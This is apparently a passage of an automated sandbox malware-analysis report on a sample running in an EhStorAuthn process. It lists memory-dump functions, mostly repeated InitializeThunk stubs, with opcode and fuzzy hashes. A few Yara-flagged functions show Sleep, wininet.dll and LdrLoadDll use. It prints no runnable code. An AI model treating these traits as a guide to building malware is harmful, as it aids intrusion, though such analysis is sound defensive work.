                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                                                          • Instruction ID: b0c8b1b9d89b6681c10f110819601343b1106fede93b04ed7c28cdda64a4bcce
                                                                          • Opcode Fuzzy Hash: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                                                          • Instruction Fuzzy Hash: BE90023521141402F1107598540864600258BE0305F56D021A5125575EC665D9916132
                                                                          Function 047C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a679e6586f13f5ae22cd64d6da624617b3fe4b09521e95a737815e8060f59fec
                                                                          • Instruction ID: 724ed6084ec801b994ba3b0e5fb45032a04a1cd173f93bea6628f300f96bfa37
                                                                          • Opcode Fuzzy Hash: a679e6586f13f5ae22cd64d6da624617b3fe4b09521e95a737815e8060f59fec
                                                                          • Instruction Fuzzy Hash: 7190022531141003F150715854186064025DBE1305F56D021E0515574CD915D9565223
                                                                          Function 047C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                                                          • Instruction ID: 42ef9a698eb7bff1014cc742f08ffdb6eb445a98398d5e9ff0301a2c5b5f7cec
                                                                          • Opcode Fuzzy Hash: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                                                          • Instruction Fuzzy Hash: C390022D22341002F1907158540860A00258BD1206F96D425A0116578CC915D9695322
                                                                          Function 047C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                                                          • Instruction ID: e201b741e320f292ac2f6b2efbab26c6fb2227883a1e8350442b7a4ed63a2ea9
                                                                          • Opcode Fuzzy Hash: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                                                          • Instruction Fuzzy Hash: 2F90023521141413F1217158450470700298BD0245F96C422A0525578D9656DA52A122
                                                                          Function 047C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                                                          • Instruction ID: 3477de52ddc57e6b6dab2908beb0797d1ed5075dc1ab0a5bb1554246d4e75f75
                                                                          • Opcode Fuzzy Hash: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                                                          • Instruction Fuzzy Hash: 84900225252451527555B158440450740269BE0245796C022A1515970C8526E956D622
                                                                          Function 047C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8066be35576fc8713152627bdcdc995f8eb0323baab9fb3302150cf5a04a6b11
                                                                          • Instruction ID: 4e2986db72a1c5feb33bc8d10feb0257542ffdc7d02e5ee6a7351ba9747be3a0
                                                                          • Opcode Fuzzy Hash: 8066be35576fc8713152627bdcdc995f8eb0323baab9fb3302150cf5a04a6b11
                                                                          • Instruction Fuzzy Hash: 5690026521181403F1507558480460700258BD0306F56C021A2165575E8A29DD516136
                                                                          Function 047C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86d572a160c210016f1691e3b8d62baa2c5046075e044c6a79fe1efcea9de325
                                                                          • Instruction ID: c2f008de3997f75ae760503072f4945780312a4661f151c26151dccb1805079a
                                                                          • Opcode Fuzzy Hash: 86d572a160c210016f1691e3b8d62baa2c5046075e044c6a79fe1efcea9de325
                                                                          • Instruction Fuzzy Hash: 7890022561141502F11171584404616002A8BD0245F96C032A1125575ECA25DA92A132
                                                                          Function 047C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                                                          • Instruction ID: e292c81da1eb5ee52cba6a34bb993ac62bd4cc7662301e7d73ec92faa2507545
                                                                          • Opcode Fuzzy Hash: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                                                          • Instruction Fuzzy Hash: 1790026535141442F11071584414B060025CBE1305F56C025E1165574D8619DD526127
                                                                          Function 047C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                                                          • Instruction ID: adb9fc78d02a4198befd458c8ef96766612af3f7ff995f3c3e7e5ce3cd9ab59f
                                                                          • Opcode Fuzzy Hash: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                                                          • Instruction Fuzzy Hash: 6F900225221C1042F21075684C14B0700258BD0307F56C125A0255574CC915D9615522
                                                                          Function 047C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a374e3abdf2a053ed45ddc1ab1d620b5ed3ae4cf424367b82c069c78a485630d
                                                                          • Instruction ID: 3785b3f18b6e8c1ebc4cafba6a51f72f19a5c57c97308ea3fd7832b610dfb81b
                                                                          • Opcode Fuzzy Hash: a374e3abdf2a053ed45ddc1ab1d620b5ed3ae4cf424367b82c069c78a485630d
                                                                          • Instruction Fuzzy Hash: EA900225611410426150716888449064025AFE1215756C131A0A99570D8559D9655666
                                                                          Function 047C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2c62fea63a108150f1474476927d283dd7eadd5f049e33285b5f12813e4b34d2
                                                                          • Instruction ID: 28283e7ebb1b2106146ef8b0344054d8d0d8db33178ed29e4b93561938a33a73
                                                                          • Opcode Fuzzy Hash: 2c62fea63a108150f1474476927d283dd7eadd5f049e33285b5f12813e4b34d2
                                                                          • Instruction Fuzzy Hash: 29900229231410022155B558060450B04659BD6355396C025F15175B0CC621D9655322
                                                                          Function 047C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                                                          • Instruction ID: 35f0f51c100f1a6977ee16f44f882d6c51214116b743856cd0100c985f4b1c1d
                                                                          • Opcode Fuzzy Hash: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                                                          • Instruction Fuzzy Hash: 9F900229221410032115B558070450700668BD5355356C031F1116570CD621D9615122
                                                                          Function 047C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                                                          • Instruction ID: fa298541c8e28e08e871563fbad70da0b1160b163f16b290bfe19e03d8de644b
                                                                          • Opcode Fuzzy Hash: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                                                          • Instruction Fuzzy Hash: 1990026521241003611571584414616402A8BE0205B56C031E11155B0DC525D9916126
                                                                          Function 047C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                                                          • Instruction ID: f4f72bc8c25152d985a40ebb9a3d6eccc1a9112476bf9592b0129258e1d2ea45
                                                                          • Opcode Fuzzy Hash: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                                                          • Instruction Fuzzy Hash: 4690023521141802F1907158440464A00258BD1305F96C025A0126674DCA15DB5977A2
                                                                          Function 047C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                                                          • Instruction ID: 26c6790c1dfebd15df2ac7dc1145904f53d6d71bb41f8103d6cae427028b0ddb
                                                                          • Opcode Fuzzy Hash: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                                                          • Instruction Fuzzy Hash: 4290023521545842F15071584404A4600358BD0309F56C021A01656B4D9625DE55B662
                                                                          Function 047C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2e513b92a74da18403eea030fae23bf497a42760c209c43e984a73f11269cd19
                                                                          • Instruction ID: f6c1d383561dda7584c716072cc670a8a52a7384e4efab740a57ce7b28215de6
                                                                          • Opcode Fuzzy Hash: 2e513b92a74da18403eea030fae23bf497a42760c209c43e984a73f11269cd19
                                                                          • Instruction Fuzzy Hash: 4590023561541802F1607158441474600258BD0305F56C021A0125674D8755DB5576A2
                                                                          Function 047C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                                                          • Instruction ID: 2371165cc3979c44bbd88dd0239d1ad66b942af6c53810d864bbc0c3834b7967
                                                                          • Opcode Fuzzy Hash: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                                                          • Instruction Fuzzy Hash: E190023561551402F1107158451470610258BD0205F66C421A0525578D8795DA5165A3
                                                                          Function 047C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 09e7978a1bed922bf61888a229522cb4ddcde804a8b93ca86f549484047bd6be
                                                                          • Instruction ID: 24a18bdc88d6c96be6f32b0bfeec6d60dabbea20da47d6f34eb65c6b38f61d69
                                                                          • Opcode Fuzzy Hash: 09e7978a1bed922bf61888a229522cb4ddcde804a8b93ca86f549484047bd6be
                                                                          • Instruction Fuzzy Hash: B290022525546102F160715C44046164025ABE0205F56C031A09155B4D8555D9556222
                                                                          Function 00703770 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 632 703770-7037b8 call 70b110 635 7038c4-7038ca 632->635 636 7037be-703838 call 70b1f0 call 6f4200 call 6e1410 call 7018d0 632->636 645 703840-703854 Sleep 636->645 646 7038b5-7038bc 645->646 647 703856-703868 645->647 646->645 650 7038be 646->650 648 70388a-7038a3 call 705ca0 647->648 649 70386a-703888 call 705c00 647->649 654 7038a8-7038ab 648->654 649->654 650->635 654->646
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 0070384B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 18a76654f6c9ecf4973ba0d793263c2dd589ec8ba91a51bd8dc0561ea4c27ddb
                                                                          • Instruction ID: 1e2a051fb7c8a565efb7cf884fc7711baf9c40b428e81bf970f8b70556207a97
                                                                          • Opcode Fuzzy Hash: 18a76654f6c9ecf4973ba0d793263c2dd589ec8ba91a51bd8dc0561ea4c27ddb
                                                                          • Instruction Fuzzy Hash: 51318DB1A01705FBD714DFA4CC85FEBBBB9EB88710F40865DB6596B281C7746640CBA0
                                                                          Function 006FF189 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 3442037557-2016760708
                                                                          • Opcode ID: a1b08092f26ef80d11d311ff10681cd2dbd105083b0b10b373f8e3055503d770
                                                                          • Instruction ID: 10e39bfcb428dddeb0463dc53c2577e1ff0c15b26a196915d4ce5f5a467253b0
                                                                          • Opcode Fuzzy Hash: a1b08092f26ef80d11d311ff10681cd2dbd105083b0b10b373f8e3055503d770
                                                                          • Instruction Fuzzy Hash: 2E312176A0060ADFDB00DFD8D8809EEB7BAFF88304B108559E515AB354D775EE05CBA0
                                                                          Function 006FF190 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 3442037557-2016760708
                                                                          • Opcode ID: 5386a0bd30a99f78d929cbd8c47ea8a5c268b1feb5e43cfdb8c00d7d2c54cd07
                                                                          • Instruction ID: f4148d3df35b4c8ccc6ecb4fd2576d0e1678433e7742cd50d49eedc2a3f4444c
                                                                          • Opcode Fuzzy Hash: 5386a0bd30a99f78d929cbd8c47ea8a5c268b1feb5e43cfdb8c00d7d2c54cd07
                                                                          • Instruction Fuzzy Hash: B0310FB5A0060ADFDB00DFD8D8809EEB7B9BF88304B108559E515AB354D775EE45CBA0
                                                                          Function 006F7DD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,006F1A20,00707C7F,>Sp,006F19E6), ref: 006F7E13
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: (*%]
                                                                          • API String ID: 2340568224-2352047701
                                                                          • Opcode ID: 4abdc2a202a297403d05a0efa03923515ee8443ffcefa3103211935ef3f62952
                                                                          • Instruction ID: 309e6f47a3109c932c11dd550d4128bb8c9d021e49e131d66dcc08676b7bb79a
                                                                          • Opcode Fuzzy Hash: 4abdc2a202a297403d05a0efa03923515ee8443ffcefa3103211935ef3f62952
                                                                          • Instruction Fuzzy Hash: 04E0C2713903047FE66497F5CC03FAE2B998F90390F098168F548DB3C3DD66E9118A65
                                                                          Function 006F429F Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006F4272
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
